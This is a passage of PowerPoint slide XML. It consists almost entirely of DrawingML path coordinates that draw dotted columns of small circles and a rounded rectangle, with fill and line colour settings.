                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3303" y="868310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12239" y="881221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25342" y="889892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41148" y="893063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57834" y="889892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71389" y="881221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80492" y="868310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83820" y="852424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80492" y="837418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71389" y="824960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57834" y="816455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41148" y="813308"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="83820" h="893445">
                  <a:moveTo>
                    <a:pt x="41148" y="697230"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="25342" y="700397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12239" y="708945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3303" y="721447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="736473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3303" y="752121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12239" y="764508"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25342" y="772656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41148" y="775588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57834" y="772656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71389" y="764508"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80492" y="752121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83820" y="736473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80492" y="721447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71389" y="708945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57834" y="700397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41148" y="697230"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="83820" h="893445">
                  <a:moveTo>
                    <a:pt x="41148" y="581279"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="25342" y="584446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12239" y="592994"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3303" y="605496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="620522"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3303" y="636170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12239" y="648557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25342" y="656705"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41148" y="659638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57834" y="656705"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71389" y="648557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80492" y="636170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83820" y="620522"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80492" y="605496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71389" y="592994"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57834" y="584446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41148" y="581279"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="83820" h="893445">
                  <a:moveTo>
                    <a:pt x="41148" y="465328"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="25342" y="468495"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12239" y="477043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3303" y="489545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="504571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3303" y="520166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12239" y="532558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25342" y="540736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41148" y="543687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57834" y="540736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71389" y="532558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80492" y="520166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83820" y="504571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80492" y="489545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71389" y="477043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57834" y="468495"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41148" y="465328"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="83820" h="893445">
                  <a:moveTo>
                    <a:pt x="41148" y="349377"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="25342" y="352327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12239" y="360505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3303" y="372897"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="388493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3303" y="403518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12239" y="416020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25342" y="424568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41148" y="427736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57834" y="424568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71389" y="416020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80492" y="403518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83820" y="388493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80492" y="372897"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71389" y="360505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57834" y="352327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41148" y="349377"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="83820" h="893445">
                  <a:moveTo>
                    <a:pt x="41148" y="233425"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="25342" y="236358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12239" y="244506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3303" y="256893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="272542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3303" y="287567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12239" y="300069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25342" y="308617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41148" y="311785"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57834" y="308617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71389" y="300069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80492" y="287567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83820" y="272542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80492" y="256893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71389" y="244506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57834" y="236358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41148" y="233425"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="83820" h="893445">
                  <a:moveTo>
                    <a:pt x="41148" y="117475"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="25342" y="120407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12239" y="128555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3303" y="140942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="156591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3303" y="171616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12239" y="184118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25342" y="192666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41148" y="195834"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57834" y="192666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71389" y="184118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80492" y="171616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83820" y="156591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80492" y="140942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71389" y="128555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57834" y="120407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41148" y="117475"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="83820" h="893445">
                  <a:moveTo>
                    <a:pt x="41148" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="25342" y="3171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12239" y="11842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3303" y="24753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="40640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3303" y="55645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12239" y="68103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25342" y="76608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41148" y="79756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57834" y="76608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71389" y="68103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80492" y="55645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83820" y="40640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80492" y="24753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71389" y="11842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57834" y="3171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41148" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="16BA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131052" y="5324855"/>
              <a:ext cx="3992879" cy="2978150"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3992879" h="2978150">
                  <a:moveTo>
                    <a:pt x="0" y="496316"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2272" y="448523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8950" y="402015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19827" y="356999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34693" y="313683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53341" y="272276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75562" y="232985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101148" y="196018"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129892" y="161585"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161585" y="129892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196018" y="101148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232985" y="75562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272276" y="53341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313683" y="34693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356999" y="19827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="402015" y="8950"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="448523" y="2272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="496316" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3496564" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3544356" y="2272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3590864" y="8950"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3635880" y="19827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3679196" y="34693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3720603" y="53341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3759894" y="75562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3796861" y="101148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3831294" y="129892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3862987" y="161585"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3891731" y="196018"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3917317" y="232985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3939538" y="272276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3958186" y="313683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3973052" y="356999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3983929" y="402015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3990607" y="448523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3992879" y="496316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3992879" y="2481580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3990607" y="2529377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3983929" y="2575890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3973052" y="2620909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3958186" y="2664227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3939538" y="2705636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3917317" y="2744927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3891731" y="2781893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3862987" y="2816325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3831294" y="2848016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3796861" y="2876758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3759894" y="2902342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3720603" y="2924561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3679196" y="2943207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3635880" y="2958071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3590864" y="2968946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3544356" y="2975623"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3496564" y="2977896"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="496316" y="2977896"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="448523" y="2975623"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="402015" y="2968946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356999" y="2958071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313683" y="2943207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272276" y="2924561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232985" y="2902342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196018" y="2876758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161585" y="2848016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129892" y="2816325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101148" y="2781893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75562" y="2744927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53341" y="2705636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34693" y="2664227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19827" y="2620909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8950" y="2575890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2272" y="2529377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2481580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="496316"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="12700">
              <a:solidFill>
                <a:srgbClr val="16BA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/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10209021" y="4422647"/>
            <a:ext cx="4092575" cy="3886835"/>
            <a:chOff x="10209021" y="4422647"/>
            <a:chExt cx="4092575" cy="3886835"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="object 23"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12175235" y="4422647"/>
              <a:ext cx="82550" cy="890269"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="82550" h="890270">
                  <a:moveTo>
                    <a:pt x="41148" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="25396" y="3147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12287" y="11652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3321" y="24110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="39115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3321" y="54929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12287" y="67802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25396" y="76459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41148" y="79628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57596" y="76459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70627" y="67802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79206" y="54929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82296" y="39115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79206" y="24110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70627" y="11652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57596" y="3147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41148" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="82550" h="890270">
                  <a:moveTo>
                    <a:pt x="41148" y="115824"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="25396" y="118993"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12287" y="127650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3321" y="140523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="156337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3321" y="171342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12287" y="183800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25396" y="192305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41148" y="195452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57596" y="192305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70627" y="183800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79206" y="171342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82296" y="156337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79206" y="140523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70627" y="127650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57596" y="118993"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41148" y="115824"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="82550" h="890270">
                  <a:moveTo>
                    <a:pt x="41148" y="231521"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="25396" y="234692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12287" y="243363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3321" y="256274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="272161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3321" y="287093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12287" y="299513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25396" y="308004"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41148" y="311150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57596" y="308004"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70627" y="299513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79206" y="287093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82296" y="272161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79206" y="256274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70627" y="243363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57596" y="234692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41148" y="231521"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="82550" h="890270">
                  <a:moveTo>
                    <a:pt x="41148" y="347344"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="25396" y="350514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12287" y="359171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3321" y="372044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="387857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3321" y="402863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12287" y="415321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25396" y="423826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41148" y="426974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57596" y="423826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70627" y="415321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79206" y="402863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82296" y="387857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79206" y="372044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70627" y="359171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57596" y="350514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41148" y="347344"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="82550" h="890270">
                  <a:moveTo>
                    <a:pt x="41148" y="464565"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="25396" y="467498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12287" y="475646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3321" y="488033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="503681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3321" y="518614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12287" y="531034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25396" y="539525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41148" y="542671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57596" y="539525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70627" y="531034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79206" y="518614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82296" y="503681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79206" y="488033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70627" y="475646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57596" y="467498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41148" y="464565"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="82550" h="890270">
                  <a:moveTo>
                    <a:pt x="41148" y="580263"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="25396" y="583213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12287" y="591391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3321" y="603783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="619378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3321" y="634384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12287" y="646842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25396" y="655347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41148" y="658494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57596" y="655347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70627" y="646842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79206" y="634384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82296" y="619378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79206" y="603783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70627" y="591391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57596" y="583213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41148" y="580263"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="82550" h="890270">
                  <a:moveTo>
                    <a:pt x="41148" y="696087"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="25396" y="699019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12287" y="707167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3321" y="719554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="735202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3321" y="750135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12287" y="762555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25396" y="771046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41148" y="774191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57596" y="771046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70627" y="762555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79206" y="750135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82296" y="735202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79206" y="719554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70627" y="707167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57596" y="699019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41148" y="696087"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="82550" h="890270">
                  <a:moveTo>
                    <a:pt x="41148" y="811784"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="25396" y="814931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12287" y="823436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3321" y="835894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="850900"/>
